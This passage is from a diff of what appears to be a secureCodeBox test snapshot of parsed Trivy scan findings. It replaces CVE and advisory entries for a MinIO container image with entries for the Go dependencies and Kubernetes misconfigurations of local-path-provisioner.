"https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-585.yaml", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-36087.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", }, { "type": "URL", - "value": "https://lore.kernel.org/selinux/CAEN2sdqJKHvDzPnxS-J8grU8fSf32DDtx=kyh84OsCq_Vm+yaQ@mail.gmail.com/T/", + "value": "https://pkg.go.dev/vuln/GO-2022-0493", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36087", + "value": "https://security.gentoo.org/glsa/202208-02", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5391-1", + "value": "https://security.netapp.com/advisory/ntap-20220729-0001/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-36087", + "value": "https://ubuntu.com/security/notices/USN-6038-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-29526", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-0563", - "installedVersion": "2.36.1-8+deb11u1", - "packageName": "libsmartcols1", + "fixedVersion": "0.3.7", + "foundIn": "Target: 'usr/local/bin/local-path-provisioner' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2021-38561", + "installedVersion": "v0.3.3", + "packageName": "golang.org/x/text", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-0563", - "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", - "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", - "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", - "https://security.netapp.com/advisory/ntap-20220331-0002/", - "https://www.cve.org/CVERecord?id=CVE-2022-0563", + "https://access.redhat.com/security/cve/CVE-2021-38561", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38561", + "https://deps.dev/advisory/OSV/GO-2021-0113", + "https://github.com/advisories/GHSA-ppp9-7jff-5vj2", + "https://go.dev/cl/340830", + "https://go.googlesource.com/text/+/383b2e75a7a4198c42f8f87833eefb772868a56f", + "https://groups.google.com/g/golang-announce", + "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", + "https://pkg.go.dev/golang.org/x/text/language", + "https://pkg.go.dev/vuln/GO-2021-0113", + "https://ubuntu.com/security/notices/USN-5873-1", + "https://www.cve.org/CVERecord?id=CVE-2021-38561", ], }, "category": "Vulnerability", - "description": "A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an "INPUTRC" environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation. This flaw affects util-linux versions prior to 2.37.4.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "description": "golang.org/x/text/language in golang.org/x/text before 0.3.7 can panic with an out-of-bounds read during BCP 47 language tag parsing. Index calculation is mishandled. If parsing untrusted user input, this can be used as a vector for a denial-of-service attack.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "util-linux: partial disclosure of arbitrary files in chfn and chsh when compiled with libreadline", + "name": "out-of-bounds read in golang.org/x/text/language leads to DoS", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-0563", + "value": "https://avd.aquasec.com/nvd/cve-2021-38561", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-0563", + "value": "https://access.redhat.com/security/cve/CVE-2021-38561", }, { "type": "URL", - "value": "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38561", }, { "type": "URL", - "value": "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", + "value": "https://deps.dev/advisory/OSV/GO-2021-0113", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", + "value": "https://github.com/advisories/GHSA-ppp9-7jff-5vj2", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220331-0002/", + "value": "https://go.dev/cl/340830", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-0563", + "value": "https://go.googlesource.com/text/+/383b2e75a7a4198c42f8f87833eefb772868a56f", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "1.1.1n-0+deb11u4", - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-4450", - "installedVersion": "1.1.1n-0+deb11u3", - "packageName": "libssl1.1", - "references": [ - "https://access.redhat.com/errata/RHSA-2023:2165", - "https://access.redhat.com/security/cve/CVE-2022-4450", - "https://bugzilla.redhat.com/1960321", - "https://bugzilla.redhat.com/2164440", - "https://bugzilla.redhat.com/2164487", - "https://bugzilla.redhat.com/2164492", - "https://bugzilla.redhat.com/2164494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", - "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", - "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", - "https://errata.almalinux.org/9/ALSA-2023-2165.html", - "https://errata.rockylinux.org/RLSA-2023:0946", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=63bcf189be73a9cc1264059bed6f57974be74a83", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=bbcf509bd046b34cca19c766bbddc31683d0858b", - "https://github.com/advisories/GHSA-v5w6-wcm8-jm4q", - "https://linux.oracle.com/cve/CVE-2022-4450.html", - "https://linux.oracle.com/errata/ELSA-2023-2932.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-4450", - "https://rustsec.org/advisories/RUSTSEC-2023-0010.html", - "https://ubuntu.com/security/notices/USN-5844-1", - "https://www.cve.org/CVERecord?id=CVE-2022-4450", - "https://www.openssl.org/news/secadv/20230207.txt", - ], - }, - "category": "Vulnerability", - "description": "The function PEM_read_bio_ex() reads a PEM file from a BIO and parses and decodes the "name" (e.g. "CERTIFICATE"), any header data and the payload data. If the function succeeds then the "name_out", "header" and "data" arguments are populated with pointers to buffers containing the relevant decoded data. The caller is responsible for freeing those buffers. It is possible to construct a PEM file that results in 0 bytes of payload data. In this case PEM_read_bio_ex() will return a failure code but will populate the header argument with a pointer to a buffer that has already been freed. If the caller also frees this buffer then a double free will occur. This will most likely lead to a crash. This could be exploited by an attacker who has the ability to supply malicious PEM files for parsing to achieve a denial of service attack. The functions PEM_read_bio() and PEM_read() are simple wrappers around PEM_read_bio_ex() and therefore these functions are also directly affected. These functions are also called indirectly by a number of other OpenSSL functions including PEM_X509_INFO_read_bio_ex() and SSL_CTX_use_serverinfo_file() which are also vulnerable. Some OpenSSL internal uses of these functions are not vulnerable because the caller does not free the header argument if PEM_read_bio_ex() returns a failure code. These locations include the PEM_read_bio_TYPE() functions as well as the decoders introduced in OpenSSL 3.0. The OpenSSL asn1parse command line application is also impacted by this issue.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "double free after calling PEM_read_bio_ex", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-4450", + "value": "https://groups.google.com/g/golang-announce", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2165", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-4450", + "value": "https://pkg.go.dev/golang.org/x/text/language", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1960321", + "value": "https://pkg.go.dev/vuln/GO-2021-0113", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164440", + "value": "https://ubuntu.com/security/notices/USN-5873-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164487", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-38561", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "0.3.8", + "foundIn": "Target: 'usr/local/bin/local-path-provisioner' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-32149", + "installedVersion": "v0.3.3", + "packageName": "golang.org/x/text", + "references": [ + "https://access.redhat.com/security/cve/CVE-2022-32149", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", + "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", + "https://github.com/golang/go/issues/56152", + "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", + "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", + "https://go.dev/cl/442235", + "https://go.dev/issue/56152", + "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", + "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", + "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", + "https://pkg.go.dev/vuln/GO-2022-1059", + "https://ubuntu.com/security/notices/USN-5873-1", + "https://www.cve.org/CVERecord?id=CVE-2022-32149", + ], + }, + "category": "Vulnerability", + "description": "An attacker may cause a denial of service by crafting an Accept-Language header which ParseAcceptLanguage will take significant time to parse.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "ParseAcceptLanguage takes a long time to parse complex tags", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/2164492", + "value": "https://avd.aquasec.com/nvd/cve-2022-32149", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164494", + "value": "https://access.redhat.com/security/cve/CVE-2022-32149", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "value": "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "value": "https://github.com/golang/go/issues/56152", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "value": "https://go.dev/cl/442235", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "value": "https://go.dev/issue/56152", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "value": "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "value": "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "value": "https://pkg.go.dev/vuln/GO-2022-1059", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "value": "https://ubuntu.com/security/notices/USN-5873-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-32149", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "2.2.8", + "foundIn": "Target: 'usr/local/bin/local-path-provisioner' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2019-11254", + "installedVersion": "v2.2.4", + "packageName": "gopkg.in/yaml.v2", + "references": [ + "https://access.redhat.com/security/cve/CVE-2019-11254", + "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=18496", + "https://github.com/advisories/GHSA-wxc4-f4m6-wwqv", + "https://github.com/go-yaml/yaml/commit/53403b58ad1b561927d19068c655246f2db79d48", + "https://github.com/go-yaml/yaml/pull/555", + "https://github.com/kubernetes/kubernetes/issues/89535", + "https://github.com/kubernetes/kubernetes/pull/87467/commits/b86df2bec4f377afc0ca03482ffad2f0a49a83b8", + "https://groups.google.com/d/msg/kubernetes-announce/ALL9s73E5ck/4yHe8J-PBAAJ", + "https://groups.google.com/forum/#!topic/kubernetes-security-announce/wuwEwZigXBc", + "https://linux.oracle.com/cve/CVE-2019-11254.html", + "https://linux.oracle.com/errata/ELSA-2020-5653.html", + "https://nvd.nist.gov/vuln/detail/CVE-2019-11254", + "https://pkg.go.dev/vuln/GO-2020-0036", + "https://security.netapp.com/advisory/ntap-20200413-0003/", + "https://www.cve.org/CVERecord?id=CVE-2019-11254", + ], + }, + "category": "Vulnerability", + "description": "The Kubernetes API Server component in versions 1.1-1.14, and versions prior to 1.15.10, 1.16.7 and 1.17.3 allows an authorized user who sends malicious YAML payloads to cause the kube-apiserver to consume excessive CPU cycles while parsing YAML.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "kubernetes: Denial of service in API server via crafted YAML payloads by authorized users", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "value": "https://avd.aquasec.com/nvd/cve-2019-11254", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "value": "https://access.redhat.com/security/cve/CVE-2019-11254", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=18496", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "value": "https://github.com/advisories/GHSA-wxc4-f4m6-wwqv", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "value": "https://github.com/go-yaml/yaml/commit/53403b58ad1b561927d19068c655246f2db79d48", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "value": "https://github.com/go-yaml/yaml/pull/555", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "value": "https://github.com/kubernetes/kubernetes/issues/89535", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "value": "https://github.com/kubernetes/kubernetes/pull/87467/commits/b86df2bec4f377afc0ca03482ffad2f0a49a83b8", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "value": "https://groups.google.com/d/msg/kubernetes-announce/ALL9s73E5ck/4yHe8J-PBAAJ", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "value": "https://groups.google.com/forum/#!topic/kubernetes-security-announce/wuwEwZigXBc", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "value": "https://linux.oracle.com/cve/CVE-2019-11254.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "value": "https://linux.oracle.com/errata/ELSA-2020-5653.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-11254", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "value": "https://pkg.go.dev/vuln/GO-2020-0036", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "value": "https://security.netapp.com/advisory/ntap-20200413-0003/", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0946", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-11254", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "0.20.0-alpha.2", + "foundIn": "Target: 'usr/local/bin/local-path-provisioner' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2020-8565", + "installedVersion": "v0.17.1", + "packageName": "k8s.io/client-go", + "references": [ + "https://access.redhat.com/security/cve/CVE-2020-8565", + "https://github.com/advisories/GHSA-8cfg-vx93-jvxw", + "https://github.com/kubernetes/kubernetes/commit/e99df0e5a75eb6e86123b56d53e9b7ca0fd00419", + "https://github.com/kubernetes/kubernetes/issues/95623", + "https://github.com/kubernetes/kubernetes/pull/95316", + "https://groups.google.com/g/kubernetes-announce/c/ScdmyORnPDk", + "https://groups.google.com/g/kubernetes-security-discuss/c/vm-HcrFUOCs/m/36utxAM5CwAJ", + "https://nvd.nist.gov/vuln/detail/CVE-2020-8565", + "https://pkg.go.dev/vuln/GO-2021-0064", + "https://www.cve.org/CVERecord?id=CVE-2020-8565", + ], + }, + "category": "Vulnerability", + "description": "In Kubernetes, if the logging level is set to at least 9, authorization and bearer tokens will be written to log files. This can occur both in API server logs and client tool output like kubectl. This affects <= v1.19.3, <= v1.18.10, <= v1.17.13, < v1.20.0-alpha2.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "kubernetes: Incomplete fix for CVE-2019-11250 allows for token leak in logs when logLevel >= 9", + "references": [ { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=63bcf189be73a9cc1264059bed6f57974be74a83", + "value": "https://avd.aquasec.com/nvd/cve-2020-8565", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=bbcf509bd046b34cca19c766bbddc31683d0858b", + "value": "https://access.redhat.com/security/cve/CVE-2020-8565", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-v5w6-wcm8-jm4q", + "value": "https://github.com/advisories/GHSA-8cfg-vx93-jvxw", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-4450.html", + "value": "https://github.com/kubernetes/kubernetes/commit/e99df0e5a75eb6e86123b56d53e9b7ca0fd00419", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "value": "https://github.com/kubernetes/kubernetes/issues/95623", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4450", + "value": "https://github.com/kubernetes/kubernetes/pull/95316", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2023-0010.html", + "value": "https://groups.google.com/g/kubernetes-announce/c/ScdmyORnPDk", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5844-1", + "value": "https://groups.google.com/g/kubernetes-security-discuss/c/vm-HcrFUOCs/m/36utxAM5CwAJ", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-4450", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-8565", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230207.txt", + "value": "https://pkg.go.dev/vuln/GO-2021-0064", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-8565", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb11u4", - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-0215", - "installedVersion": "1.1.1n-0+deb11u3", - "packageName": "libssl1.1", + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/local-path-provisioner' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV001", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "https://access.redhat.com/errata/RHSA-2023:2165", - "https://access.redhat.com/security/cve/CVE-2023-0215", - "https://bugzilla.redhat.com/1960321", - "https://bugzilla.redhat.com/2164440", - "https://bugzilla.redhat.com/2164487", - "https://bugzilla.redhat.com/2164492", - "https://bugzilla.redhat.com/2164494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", - "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", - "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", - "https://errata.almalinux.org/9/ALSA-2023-2165.html", - "https://errata.rockylinux.org/RLSA-2023:0946", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8818064ce3c3c0f1b740a5aaba2a987e75bfbafd", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9816136fe31d92ace4037d5da5257f763aeeb4eb", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=c3829dd8825c654652201e16f8a0a0c46ee3f344", - "https://github.com/advisories/GHSA-r7jw-wp68-3xch", - "https://linux.oracle.com/cve/CVE-2023-0215.html", - "https://linux.oracle.com/errata/ELSA-2023-2932.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-0215", - "https://rustsec.org/advisories/RUSTSEC-2023-0009.html", - "https://security.netapp.com/advisory/ntap-20230427-0007/", - "https://security.netapp.com/advisory/ntap-20230427-0009/", - "https://ubuntu.com/security/notices/USN-5844-1", - "https://ubuntu.com/security/notices/USN-5845-1", - "https://ubuntu.com/security/notices/USN-5845-2", - "https://www.cve.org/CVERecord?id=CVE-2023-0215", - "https://www.openssl.org/news/secadv/20230207.txt", + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv001", ], }, - "category": "Vulnerability", - "description": "The public API function BIO_new_NDEF is a helper function used for streaming -ASN.1 data via a BIO. It is primarily used internally to OpenSSL to support the -SMIME, CMS and PKCS7 streaming capabilities, but may also be called directly by -end user applications. - -The function receives a BIO from the caller, prepends a new BIO_f_asn1 filter -BIO onto the front of it to form a BIO chain, and then returns the new head of -the BIO chain to the caller. Under certain conditions, for example if a CMS -recipient public key is invalid, the new filter BIO is freed and the function -returns a NULL result indicating a failure. However, in this case, the BIO chain -is not properly cleaned up and the BIO passed by the caller still retains -internal pointers to the previously freed filter BIO. If the caller then goes on -to call BIO_pop() on the BIO then a use-after-free will occur. This will most -likely result in a crash. - - - -This scenario occurs directly in the internal function B64_write_ASN1() which -may cause BIO_new_NDEF() to be called and will subsequently call BIO_pop() on -the BIO. This internal function is in turn called by the public API functions -PEM_write_bio_ASN1_stream, PEM_write_bio_CMS_stream, PEM_write_bio_PKCS7_stream, -SMIME_write_ASN1, SMIME_write_CMS and SMIME_write_PKCS7. - -Other public API functions that may be impacted by this include -i2d_ASN1_bio_stream, BIO_new_CMS, BIO_new_PKCS7, i2d_CMS_bio_stream and -i2d_PKCS7_bio_stream. - -The OpenSSL cms and smime command line applications are similarly affected. - - - -", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "use-after-free following BIO_new_NDEF", + "category": "Misconfiguration", + "description": "A program inside the container can elevate its own privileges and run as root, which might give the program control over the container and node.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": "Set 'set containers[].securityContext.allowPrivilegeEscalation' to 'false'.", + "name": "Process can elevate its own privileges(Container 'local-path-provisioner' of Deployment 'local-path-provisioner' should set 'securityContext.allowPrivilegeEscalation' to false)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-0215", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2165", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-0215", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/1960321", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2164440", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2164487", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2164492", + "value": "https://avd.aquasec.com/misconfig/ksv001", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164494", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/local-path-provisioner' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV003", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", + "https://avd.aquasec.com/misconfig/ksv003", + ], + }, + "category": "Misconfiguration", + "description": "The container should drop all default capabilities and add only those that are needed for its execution.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": "Add 'ALL' to containers[].securityContext.capabilities.drop.", + "name": "Default capabilities not dropped(Container 'local-path-provisioner' of Deployment 'local-path-provisioner' should add 'ALL' to 'securityContext.capabilities.drop')", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "value": "https://avd.aquasec.com/misconfig/ksv003", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "value": "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/local-path-provisioner' / Class: 'config' / 